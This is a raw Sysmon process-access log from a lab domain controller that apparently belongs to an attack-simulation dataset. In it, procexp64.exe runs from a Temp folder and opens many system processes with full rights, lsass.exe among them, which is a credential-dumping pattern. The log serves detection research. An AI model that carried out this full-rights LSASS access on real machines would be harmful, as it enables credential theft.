15:16:46.470{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790676Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:46.470{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790675Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:46.470{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790674Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:46.470{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790673Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:46.470{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790672Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:46.470{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790671Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:46.470{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790670Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:46.470{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790669Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:46.470{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790668Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:46.470{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790667Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:46.470{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790666Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:46.470{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790665Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:46.470{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790664Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:46.470{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790663Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:46.470{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790662Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:46.470{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790661Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:46.470{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790660Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:46.470{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790659Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:46.470{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790658Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:46.470{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790657Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:46.470{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790656Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:46.470{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790655Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:46.470{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790654Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:46.470{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790653Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:46.470{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790652Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:46.470{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790651Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:46.470{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790650Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:46.470{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790649Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:46.470{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790648Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:46.470{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790647Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:46.470{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790646Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:46.470{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790645Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:46.470{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790786Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:47.517{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3255-6010-D4A2-00000000A301}4024C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790785Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:47.501{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790784Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:47.501{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790783Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:47.501{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790782Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:47.501{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 